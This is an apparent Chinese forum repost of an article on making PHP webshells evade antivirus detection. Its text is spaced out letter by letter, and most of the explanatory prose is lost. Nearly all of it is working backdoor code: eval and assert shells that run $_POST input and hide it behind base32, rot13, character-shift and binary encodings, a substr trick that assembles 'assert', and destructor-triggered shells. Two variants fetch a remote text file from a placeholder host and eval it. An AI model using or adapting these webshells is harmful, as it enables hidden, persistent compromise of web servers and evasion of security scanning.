搜索

[21864] 2021-04-13_webshell免杀的技巧

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-04-13_webshell免杀的技巧 w e b s h e l l   L e m o n S e c   2 0 2 1 - 0 4 - 1 3 0 x 0 0     p h p 7   a s s e r t       0 x 0 1 B y p a s s B a s e 6 4   d i r +   s h e l l         b a s e 3 2   b a s e 5 8   b a s e   a s c i i   b a s e 3 2 p a y l o a d h t t p s : / / g i t h u b . c o m / p u r e q h / w e b s h e l l < ? p h p c l a s s   K U Y E {             p u b l i c   $ D A X W   =   n u l l ;             p u b l i c   $ L R X V   =   n u l l ;             f u n c t i o n   _ _ c o n s t r u c t ( ) {             $ t h i s - > D A X W   =   ' m v 3 g c 3 b i e r p v a t 2 t k r n x u z l s n 5 o s s o y ' ;             $ t h i s - > L R X V   =   @ S Y X J ( $ t h i s - > D A X W ) ;             @ e v a l ( " / * G n S p e = u * / " . $ t h i s - > L R X V . " / * G n S p e = u * / " ) ;             } } n e w   K U Y E ( ) ; f u n c t i o n   M N W K ( $ Q S F X ) {     $ B A S E 3 2 _ A L P H A B E T   =   ' a b c d e f g h i j k l m n o p q r s t u v w x y z 2 3 4 5 6 7 ' ;     $ N L H B   =   ' ' ;     $ v   =   0 ;     $ v b i t s   =   0 ;     f o r   ( $ i   =   0 ,   $ j   =   s t r l e n ( $ Q S F X ) ;   $ i   <   $ j ;   $ i + + ) {     $ v   < < =   8 ;             $ v   + =   o r d ( $ Q S F X [ $ i ] ) ;             $ v b i t s   + =   8 ;             w h i l e   ( $ v b i t s   > =   5 )   {
a s c i i p a y l o a d             w h i l e   ( $ v b i t s   > =   5 )   {                     $ v b i t s   - =   5 ;                     $ N L H B   . =   $ B A S E 3 2 _ A L P H A B E T [ $ v   > >   $ v b i t s ] ;                     $ v   & =   ( ( 1   < <   $ v b i t s )   -   1 ) ; } }     i f   ( $ v b i t s   >   0 ) {             $ v   < < =   ( 5   -   $ v b i t s ) ;             $ N L H B   . =   $ B A S E 3 2 _ A L P H A B E T [ $ v ] ; }     r e t u r n   $ N L H B ; } f u n c t i o n   S Y X J ( $ Q S F X ) {     $ N L H B   =   ' ' ;     $ v   =   0 ;     $ v b i t s   =   0 ;     f o r   ( $ i   =   0 ,   $ j   =   s t r l e n ( $ Q S F X ) ;   $ i   <   $ j ;   $ i + + ) {             $ v   < < =   5 ;             i f   ( $ Q S F X [ $ i ]   > =   ' a '   & &   $ Q S F X [ $ i ]   < =   ' z ' ) {                     $ v   + =   ( o r d ( $ Q S F X [ $ i ] )   -   9 7 ) ;             }   e l s e i f   ( $ Q S F X [ $ i ]   > =   ' 2 '   & &   $ Q S F X [ $ i ]   < =   ' 7 ' )   {                     $ v   + =   ( 2 4   +   $ Q S F X [ $ i ] ) ;             }   e l s e   {                     e x i t ( 1 ) ;             }             $ v b i t s   + =   5 ;             w h i l e   ( $ v b i t s   > =   8 ) {                     $ v b i t s   - =   8 ;                     $ N L H B   . =   c h r ( $ v   > >   $ v b i t s ) ;                     $ v   & =   ( ( 1   < <   $ v b i t s )   -   1 ) ; } }     r e t u r n   $ N L H B ; } ? > < ? p h p c l a s s   F K P C {             f u n c t i o n   _ _ c o n s t r u c t ( ) {             $ t h i s - > T Q Y V   =   " b s ^ i % ! M L P Q X w b o l Z & 8 " ;             $ t h i s - > W Z D M   =   @ H H G J ( $ t h i s - > T Q Y V ) ;             @ e v a l ( " / * # j k s k j w j q o * / " . $ t h i s - > W Z D M . " / * s j # a h a j s j * / " ) ;             } } n e w   F K P C ( ) ; f u n c t i o n   H H G J ( $ U y G v )   { $ s v f e   =   [ ] ; $ m x A S   =   ' ' ; $ f   =   $ U y G v ; f o r   ( $ i = 0 ; $ i < s t r l e n ( $ f ) ; $ i + + ) {     $ s v f e [ ]   =   c h r ( ( o r d ( $ f [ $ i ] ) + 3 ) ) ; } $ m x A S   =   i m p l o d e ( $ s v f e ) ; r e t u r n   $ m x A S   ; } ? >
w e b d i r +       D R o t 1 3 p a y l o a d p a y l o a d < ? p h p c l a s s   K U Y E {                 p u b l i c   $ D A X W   =   n u l l ;                 p u b l i c   $ L R X V   =   n u l l ;                 f u n c t i o n   _ _ c o n s t r u c t ( ) {                 $ t h i s - > D A X W   =   ' r i n y ( $ _ C B F G [ m r e b ] ) ; ' ;                 $ t h i s - > L R X V   =   @ s t r _ r o t 1 3 ( $ t h i s - > D A X W ) ;                 @ e v a l ( " / * G n S p e = u * / " . $ t h i s - > L R X V . " / * G n S p e = u * / " ) ;                 } } n e w   K U Y E ( ) ; ? > < ? p h p c l a s s   K U Y E {                 p u b l i c   $ D A X W   =   n u l l ;                 p u b l i c   $ L R X V   =   n u l l ;                 f u n c t i o n   _ _ c o n s t r u c t ( ) {                 $ t h i s - > D A X W   =   ' 1 1 0 0 1 0 1   1 1 1 0 1 1 0   1 1 0 0 0 0 1   1 1 0 1 1 0 0   1 0 1 0 0 0   1 0 0 1 0 0   1 0 1 1 1 1 1   1 0 1 0 0 0 0   1 0 0 1 1 1 1   1 0 1 0 0 1 1   1 0 1 0 1 0 0   1 0 1 1 0 1 1   1 1 1 1 0 1 0   1 1 0 0 1 0 1   1 1 1 0 0 1 0   1 1 0 1 1 1 1   1 0 1 1 1 0 1   1 0 1 0 0 1   1 1 1 0 1 1 ' ;                 $ t h i s - > L R X V   =   @ B i n T o S t r ( $ t h i s - > D A X W ) ;                 @ e v a l ( " / * G n S p e = u * / " . $ t h i s - > L R X V . " / * G n S p e = u * / " ) ;                 } } n e w   K U Y E ( ) ; f u n c t i o n   B i n T o S t r ( $ s t r ) {         $ a r r   =   e x p l o d e ( '   ' ,   $ s t r ) ;         f o r e a c h ( $ a r r   a s   & $ v ) {                 $ v   =   p a c k ( " H " . s t r l e n ( b a s e _ c o n v e r t ( $ v ,   2 ,   1 6 ) ) ,   b a s e _ c o n v e r t ( $ v ,   2 ,   1 6 ) ) ;         }
    0 x 0 2 h t t p w e b d i r +   a s c i i               h t t p 访         }         r e t u r n   j o i n ( ' ' ,   $ a r r ) ; } ? > < ? p h p c l a s s   F K P C {                 f u n c t i o n   _ _ c o n s t r u c t ( ) {                 $ u r l   =   " h t t p : / / x x x x x : 8 0 8 0 / 1 . t x t " ;                 $ f p   =   f o p e n ( $ u r l ,   ' r ' ) ;                 s t r e a m _ g e t _ m e t a _ d a t a ( $ f p ) ;                 w h i l e   ( ! f e o f ( $ f p ) )   {                         $ b o d y . =   f g e t s ( $ f p ,   1 0 2 4 ) ;                 }                 $ t h i s - > x   =   $ b o d y ;                 $ t h i s - > T Q Y V   =   " b s ^ i % ! M L P Q X w b o l Z & 8 " ;                 $ t h i s - > W Z D M   =   @ H H G J ( $ t h i s - > T Q Y V , $ t h i s - > x ) ;                 @ e v a l ( " / * # j k s k j w j q o * / " . $ t h i s - > W Z D M . " / * s j # a h a j s j * / " ) ;                 } } n e w   F K P C ( ) ; f u n c t i o n   H H G J ( $ U y G v , $ x )   { $ s v f e   =   [ ] ; $ m x A S   =   ' ' ; $ f   =   $ U y G v ; f o r   ( $ i = 0 ; $ i < s t r l e n ( $ f ) ; $ i + + ) {         $ s v f e [ ]   =   c h r ( ( o r d ( $ f [ $ i ] ) + $ x ) ) ; } $ m x A S   =   i m p l o d e ( $ s v f e ) ; r e t u r n   $ m x A S   ; } ? >
    h t t p p a y l o a d   . . . ? > < ? p h p c l a s s   K U Y E {                 p u b l i c   $ a   =   ' y s h a s a u i ' ;                 p u b l i c   $ b   =   ' ' ;                 f u n c t i o n   _ _ c o n s t r u c t ( ) {                 $ u r l   =   " h t t p : / / x x x / 1 . t x t " ;                 $ f p   =   f o p e n ( $ u r l ,   ' r ' ) ;                 s t r e a m _ g e t _ m e t a _ d a t a ( $ f p ) ;                 w h i l e   ( ! f e o f ( $ f p ) )   {                         $ b o d y . =   f g e t s ( $ f p ,   1 0 2 4 ) ;                 }                 $ t h i s - > b   =   $ b o d y ;                 @ e v a l ( " / * G n S p e = 1 2 1 u * / " . $ t h i s - > b . " / * G n 2 1 2 S p e = u * / " ) ;                 } } n e w   K U Y E ( ) ; ? >
0 x 0 3 B y p a s s         使 s u b s t r w e b d i r +   s u b s t r < ? p h p $ a   =   s u b s t r ( " a s s e r t x x " , 0 , 6 ) ; $ a ( $ _ P O S T [ ' x ' ] ) ; ? > f u n c t i o n   m y s u b s t r ( $ s t r i n g ,   $ s t a r t   =   0 ,   $ l e n g t h   =   n u l l )   {         $ r e s u l t   =   ' ' ;         $ s t r L e n g t h   =   s t r l e n ( $ s t r i n g ) ;         i f   ( $ l e n g t h   = = =   n u l l )   {                 $ l e n g t h   =   $ s t r L e n g t h ;         }         $ l e n g t h   =   ( i n t )   $ l e n g t h ;         $ s t a r t   =   $ s t a r t   <   0   ?   ( $ s t r L e n g t h   +   $ s t a r t )   :   ( $ s t a r t ) ;
D   2               $ e n d   =   $ l e n g t h   <   0   ?   ( $ s t r L e n g t h   +   $ l e n g t h )   :   $ s t a r t   +   $ l e n g t h ;         i f   ( $ s t a r t   >   $ s t r L e n g t h   | |   ( $ e n d   -   $ s t a r t )   = = =   0 )   {                 r e t u r n   $ r e s u l t ;         }         f o r   ( ;   $ s t a r t   <   $ e n d ;   $ s t a r t   + + )   {                 $ r e s u l t   . =   $ s t r i n g [ $ s t a r t ] ;         }         r e t u r n   $ r e s u l t ; } < ? p h p $ b   =   ' a s s e r t ( x y z @ ' ; $ c   =     m y s u b s t r ( $ b , 0 , 6 ) ; $ c ( $ _ P O S T [ ' z e r o ' ] ) ; f u n c t i o n   m y s u b s t r ( $ s t r i n g ,   $ s t a r t   =   0 ,   $ l e n g t h   =   n u l l )   {         $ r e s u l t   =   ' ' ;         $ s t r L e n g t h   =   s t r l e n ( $ s t r i n g ) ;         i f   ( $ l e n g t h   = = =   n u l l )   {                 $ l e n g t h   =   $ s t r L e n g t h ;         }         $ l e n g t h   =   ( i n t )   $ l e n g t h ;         $ s t a r t   =   $ s t a r t   <   0   ?   ( $ s t r L e n g t h   +   $ s t a r t )   :   ( $ s t a r t ) ;         $ e n d   =   $ l e n g t h   <   0   ?   ( $ s t r L e n g t h   +   $ l e n g t h )   :   $ s t a r t   +   $ l e n g t h ;         i f   ( $ s t a r t   >   $ s t r L e n g t h   | |   ( $ e n d   -   $ s t a r t )   = = =   0 )   {                 r e t u r n   $ r e s u l t ;         }         f o r   ( ;   $ s t a r t   <   $ e n d ;   $ s t a r t   + + )   {                 $ r e s u l t   . =   $ s t r i n g [ $ s t a r t ] ;         }         r e t u r n   $ r e s u l t ; } ? >
  m y s u b s t r         D < ? p h p c l a s s   p u r e {     p u b l i c   $ a   =   ' ' ;     f u n c t i o n   _ _ d e s t r u c t ( ) {         a s s e r t ( " $ t h i s - > a " ) ;     } } $ b   =   n e w   p u r e ; $ b - > a   =   $ _ P O S T [ ' z e r o ' ] ; f u n c t i o n   m y s u b s t r ( $ s t r i n g ,   $ s t a r t   =   0 ,   $ l e n g t h   =   n u l l )   {         $ r e s u l t   =   ' ' ;         $ s t r L e n g t h   =   s t r l e n ( $ s t r i n g ) ;         i f   ( $ l e n g t h   = = =   n u l l )   {                 $ l e n g t h   =   $ s t r L e n g t h ;         }         $ l e n g t h   =   ( i n t )   $ l e n g t h ;         $ s t a r t   =   $ s t a r t   <   0   ?   ( $ s t r L e n g t h   +   $ s t a r t )   :   ( $ s t a r t ) ;         $ e n d   =   $ l e n g t h   <   0   ?   ( $ s t r L e n g t h   +   $ l e n g t h )   :   $ s t a r t   +   $ l e n g t h ;         i f   ( $ s t a r t   >   $ s t r L e n g t h   | |   ( $ e n d   -   $ s t a r t )   = = =   0 )   {                 r e t u r n   $ r e s u l t ;         }         f o r   ( ;   $ s t a r t   <   $ e n d ;   $ s t a r t   + + )   {                 $ r e s u l t   . =   $ s t r i n g [ $ s t a r t ] ;         }         r e t u r n   $ r e s u l t ; } ? > < ? p h p c l a s s   p u r e {     p u b l i c   $ a   =   ' ' ;     f u n c t i o n   _ _ d e s t r u c t ( ) {
    D           a s s e r t ( " $ t h i s - > a " ) ;     } } $ b   =   n e w   p u r e ; $ b - > a   =   $ _ P O S T [ ' z e r o ' ] ; ? > < ? p h p c l a s s   p u r e {     p u b l i c   $ a   =   ' ' ;     f u n c t i o n   _ _ d e s t r u c t ( ) {         a s s e r t ( " $ t h i s - > a " ) ;     } } $ b   =   n e w   p u r e ; $ b - > a   =   $ _ P O S T [ ' z e r o ' ] ; f u n c t i o n   m y s u b s t r ( $ a , $ b )   {         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ;         e c h o   " ? s a s a s j a j k s j k a " ; } ? >
s u b s t r     * * 0 x 0 4   L e m o n S e c
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理